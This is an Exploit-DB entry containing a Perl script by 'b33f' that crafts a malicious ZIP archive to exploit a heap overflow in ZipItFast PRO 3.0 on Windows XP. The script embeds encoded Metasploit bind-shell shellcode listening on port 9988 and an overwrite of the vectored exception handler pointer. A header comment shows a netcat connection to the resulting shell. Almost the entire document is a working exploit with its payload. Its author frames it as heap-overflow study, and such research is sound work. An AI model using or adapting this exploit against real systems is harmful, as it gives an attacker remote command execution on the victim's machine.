ZipItFast PRO 3.0 - Local Heap Overflow

EDB-ID:

19776

CVE:



Author:

b33f

Type:

local


Platform:

Windows

Date:

2012-07-12


#!/usr/bin/perl

#---------------------------------------------------------------------------#
# Exploit: ZipItFast PRO v3.0 Heap-Overflow                                 #
# Author: b33f - http://www.fuzzysecurity.com/                              #
# OS: Windows XP SP1                                                        #
# DOS POC: C4SS!0 G0M3S => http://www.exploit-db.com/exploits/17512/        #
# Software: https://www.exploit-db.com/apps/                                #
#           decbc54ffcf644e780a3ef4fcdd27093-zipitfastnow.exe               #
#---------------------------------------------------------------------------#
# Sorry for reinventing the wheel but learning about heap-overflows         #
# requires you to take a step back and roll with the punches not unlike     #
# watching a David Lynch production ;))...                                  #
#                                                                           #
# - "Who is that lady with the log?"                                        #
# + "We call her the log-lady.."                                            #
#---------------------------------------------------------------------------#
# root@bt:~# nc -nv 192.168.111.131 9988                                    #
# (UNKNOWN) [192.168.111.131] 9988 (?) open                                 #
# Microsoft Windows XP [Version 5.1.2600]                                   #
# (C) Copyright 1985-2001 Microsoft Corp.                                   #
#                                                                           #
# C:\Documents and Settings\Owner\Desktop>                                  #
#---------------------------------------------------------------------------#

use strict;
use warnings;
 
my $filename = "Exploit.zip";

my $head = 
"\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f".
"\x00\x00\x00";
 
my $head2 = 
"\x50\x4B\x01\x02\x14\x00\x14".
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f".
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";
 
my $head3 = 
"\x50\x4B\x05\x06\x00\x00\x00".
"\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00".
"\x02\x10\x00\x00".
"\x00\x00";

# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t
# [*] x86/alpha_mixed succeeded with size 744 (iteration=1)
my $ph33r = 
"\x89\xe2\xda\xd5\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x39\x6c\x39\x78\x4c\x49\x55\x50\x47\x70" .
"\x55\x50\x35\x30\x6f\x79\x59\x75\x54\x71\x78\x52\x52\x44" .
"\x6e\x6b\x42\x72\x44\x70\x6e\x6b\x30\x52\x56\x6c\x4e\x6b" .
"\x30\x52\x35\x44\x4e\x6b\x52\x52\x77\x58\x56\x6f\x68\x37" .
"\x61\x5a\x46\x46\x64\x71\x79\x6f\x74\x71\x6f\x30\x6c\x6c" .
"\x75\x6c\x65\x31\x33\x4c\x56\x62\x34\x6c\x31\x30\x6f\x31" .
"\x4a\x6f\x64\x4d\x73\x31\x6a\x67\x6d\x32\x4c\x30\x70\x52" .
"\x56\x37\x4e\x6b\x50\x52\x76\x70\x6c\x4b\x61\x52\x77\x4c" .
"\x73\x31\x6a\x70\x4c\x4b\x37\x30\x52\x58\x6f\x75\x79\x50" .
"\x72\x54\x73\x7a\x45\x51\x4a\x70\x42\x70\x4c\x4b\x32\x68" .
"\x65\x48\x6c\x4b\x63\x68\x65\x70\x76\x61\x39\x43\x6b\x53" .
"\x65\x6c\x77\x39\x4e\x6b\x76\x54\x4c\x4b\x76\x61\x48\x56" .
"\x76\x51\x49\x6f\x55\x61\x79\x50\x6e\x4c\x6f\x31\x58\x4f" .
"\x56\x6d\x45\x51\x38\x47\x66\x58\x69\x70\x42\x55\x6a\x54" .
"\x74\x43\x53\x4d\x5a\x58\x77\x4b\x73\x4d\x64\x64\x33\x45" .
"\x48\x62\x73\x68\x6e\x6b\x61\x48\x76\x44\x76\x61\x6a\x73" .
"\x50\x66\x6e\x6b\x46\x6c\x62\x6b\x6c\x4b\x36\x38\x35\x4c" .
"\x56\x61\x4b\x63\x6c\x4b\x43\x34\x6e\x6b\x33\x31\x7a\x70" .
"\x6e\x69\x62\x64\x34\x64\x56\x44\x33\x6b\x63\x6b\x50\x61" .
"\x31\x49\x73\x6a\x72\x71\x79\x6f\x59\x70\x32\x78\x33\x6f" .
"\x32\x7a\x4e\x6b\x56\x72\x68\x6b\x6b\x36\x43\x6d\x71\x78" .
"\x47\x43\x55\x62\x47\x70\x67\x70\x71\x78\x53\x47\x42\x53" .
"\x50\x32\x31\x4f\x46\x34\x53\x58\x70\x4c\x30\x77\x76\x46" .
"\x47\x77\x6b\x4f\x38\x55\x6f\x48\x6e\x70\x37\x71\x77\x70" .
"\x77\x70\x65\x79\x6f\x34\x42\x74\x76\x30\x75\x38\x46\x49" .
"\x6b\x30\x30\x6b\x53\x30\x79\x6f\x4e\x35\x30\x50\x62\x70" .
"\x62\x70\x52\x70\x33\x70\x42\x70\x51\x50\x42\x70\x72\x48" .
"\x68\x6a\x74\x4f\x39\x4f\x79\x70\x69\x6f\x4e\x35\x6e\x69" .
"\x6f\x37\x34\x71\x4b\x6b\x76\x33\x63\x58\x66\x62\x65\x50" .
"\x35\x77\x55\x54\x6e\x69\x4a\x46\x51\x7a\x56\x70\x33\x66" .
"\x66\x37\x51\x78\x6f\x32\x39\x4b\x77\x47\x55\x37\x6b\x4f" .
"\x4b\x65\x66\x33\x31\x47\x50\x68\x4d\x67\x48\x69\x75\x68" .
"\x4b\x4f\x49\x6f\x4e\x35\x32\x73\x62\x73\x62\x77\x32\x48" .
"\x43\x44\x68\x6c\x45\x6b\x6d\x31\x6b\x4f\x4e\x35\x42\x77" .
"\x6f\x79\x78\x47\x52\x48\x62\x55\x70\x6e\x30\x4d\x75\x31" .
"\x6b\x4f\x59\x45\x53\x58\x50\x63\x62\x4d\x32\x44\x73\x30" .
"\x4f\x79\x79\x73\x63\x67\x56\x37\x73\x67\x35\x61\x39\x66" .
"\x51\x7a\x66\x72\x36\x39\x61\x46\x58\x62\x6b\x4d\x63\x56" .
"\x39\x57\x70\x44\x34\x64\x37\x4c\x53\x31\x57\x71\x4e\x6d" .
"\x70\x44\x66\x44\x74\x50\x7a\x66\x75\x50\x42\x64\x62\x74" .
"\x36\x30\x71\x46\x42\x76\x30\x56\x72\x66\x30\x56\x30\x4e" .
"\x70\x56\x76\x36\x73\x63\x53\x66\x33\x58\x72\x59\x38\x4c" .
"\x47\x4f\x4c\x46\x59\x6f\x4a\x75\x6f\x79\x59\x70\x50\x4e" .
"\x53\x66\x71\x56\x59\x6f\x56\x50\x75\x38\x34\x48\x6f\x77" .
"\x37\x6d\x63\x50\x59\x6f\x79\x45\x4f\x4b\x48\x70\x6c\x75" .
"\x4c\x62\x31\x46\x45\x38\x6f\x56\x5a\x35\x4d\x6d\x6f\x6d" .
"\x79\x6f\x5a\x75\x55\x6c\x37\x76\x53\x4c\x45\x5a\x4f\x70" .
"\x79\x6b\x4d\x30\x43\x45\x73\x35\x4d\x6b\x63\x77\x77\x63" .
"\x70\x72\x50\x6f\x70\x6a\x77\x70\x61\x43\x59\x6f\x79\x45" .
"\x41\x41";

my $buf1 = "A" x 4064 . ".txt";

#################
# EAX => 256-bytes => 0x77fc3210 - 0x04 => 0x77fc320c (_VECTORED_EXCEPTION_NODE)
# EDX => 260-bytes => 0x0012FA28 - 0x08 => 0x0012FA20 (PTR shellcode)
# Jump over Blink and Flink => EB 0A
#################
my $magic = "\xEB\x0A" . "\x0C\x32\xFC\x77" . "\x20\xFA\x12\x00";

##################
# Notice that the offsets don't correspond exactly. I experienced some buffer
# expansion and compression depending on the buffer structure so keep that in
# mind if you want to do some testing.
#
# Remember to set Anti-Debugging flags in your debugger..
# (immunity = > !hidedebug All_Debug)
##################
my $buf2 = "\x90" x 253 . $magic . "A" x 300 . $ph33r . "A" x 2756 . ".txt";

my $zip = $head.$buf1.$head2.$buf2.$head3;
open(FILE,">$filename") || die "[-]Error:\n$!\n";
print FILE $zip;
close(FILE);